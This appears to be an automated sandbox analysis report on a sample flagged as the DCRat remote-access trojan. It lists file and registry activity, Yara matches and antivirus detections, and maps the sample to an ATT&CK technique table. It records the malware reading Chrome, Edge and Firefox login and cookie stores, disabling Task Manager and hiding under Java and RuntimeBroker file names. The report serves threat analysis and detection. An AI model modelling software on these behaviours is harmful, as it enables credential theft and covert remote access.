                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe Queries volume information: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Code function: 0_2_0059DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0059DF1E
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Code function: 0_2_0058B146 GetVersionExW,0_2_0058B146
                                    Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                                    Lowering of HIPS / PFW / Operating System Security Settings

                                    Source: C:\Windows\SysWOW64\reg.exe Registry value created: DisableTaskMgr 1
                                    Source: C:\Windows\SysWOW64\reg.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

                                    Stealing of Sensitive Information

                                    Source: Yara match, File source: 0000001F.00000002.4141584721.0000000003008000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: 0000001F.00000002.4141584721.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000005.00000002.1748446594.00000000127DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: Process Memory Space: Agentcomponentbrokermonitordhcp.exe PID: 600, type: MEMORYSTR
                                    Source: Yara match, File source: Process Memory Space: aXnWbWpBWYJmkhPMHrrUNM.exe PID: 7448, type: MEMORYSTR
                                    Source: Yara match, File source: Process Memory Space: aXnWbWpBWYJmkhPMHrrUNM.exe PID: 7580, type: MEMORYSTR
                                    Source: Yara match, File source: 1znAXdPcM5.exe, type: SAMPLE
                                    Source: Yara match, File source: 0.3.1znAXdPcM5.exe.5714721.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 0.3.1znAXdPcM5.exe.6dd8721.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 0.3.1znAXdPcM5.exe.6dd8721.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 5.0.Agentcomponentbrokermonitordhcp.exe.b0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 00000005.00000000.1700421210.00000000000B2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000000.00000003.1669164420.0000000006D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000000.00000003.1669786460.00000000056C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, type: DROPPED
                                    Source: Yara match, File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara match, File source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, type: DROPPED
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                                    Remote Access Functionality

Source: Yara match, File source: 0000001F.00000002.4141584721.0000000003008000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001F.00000002.4141584721.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.1748446594.00000000127DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: Agentcomponentbrokermonitordhcp.exe PID: 600, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: aXnWbWpBWYJmkhPMHrrUNM.exe PID: 7448, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: aXnWbWpBWYJmkhPMHrrUNM.exe PID: 7580, type: MEMORYSTR
Source: Yara match, File source: 1znAXdPcM5.exe, type: SAMPLE
Source: Yara match, File source: 0.3.1znAXdPcM5.exe.5714721.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.1znAXdPcM5.exe.6dd8721.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.1znAXdPcM5.exe.6dd8721.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.Agentcomponentbrokermonitordhcp.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000005.00000000.1700421210.00000000000B2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.1669164420.0000000006D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.1669786460.00000000056C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Gather Victim Identity Information | 11 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 21 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 12 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 3 Obfuscated Files or Information | Security Account Manager | 137 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 12 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Software Packing | NTDS | 221 Security Software Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 122 Masquerading | Cached Domain Credentials | 131 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Modify Registry | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 131 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
[Behavior graph (image not reproduced). Behavior Graph ID: 1583022; Sample: 1znAXdPcM5.exe; Start date: 01/01/2025; Architecture: WINDOWS; Score: 100]

Source | Detection | Scanner | Label | Link
--- | --- | --- | --- | ---
1znAXdPcM5.exe | 49% | Virustotal | | Browse
1znAXdPcM5.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
1znAXdPcM5.exe | 100% | Avira | VBS/Runner.VPG |
1znAXdPcM5.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
--- | --- | --- | --- | ---
C:\Users\user\Desktop\QPyLHGSL.log | 100% | Avira | TR/AVI.Agent.updqb |
C:\Users\user\AppData\Local\Temp\IwAYZ2SgOs.bat | 100% | Avira | BAT/Delbat.C |
C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe | 100% | Avira | VBS/Runner.VPG |
C:\Users\user\Desktop\axSbriXt.log | 100% | Avira | TR/PSW.Agent.qngqt |
C:\Users\user\Desktop\XeElcNfe.log | 100% | Avira | TR/PSW.Agent.qngqt |
C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\Desktop\ebskEcaT.log | 100% | Avira | TR/AVI.Agent.updqb |
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\Desktop\axSbriXt.log | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\XeElcNfe.log | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\IlqWXNCe.log | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\ToOuVQfl.log | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
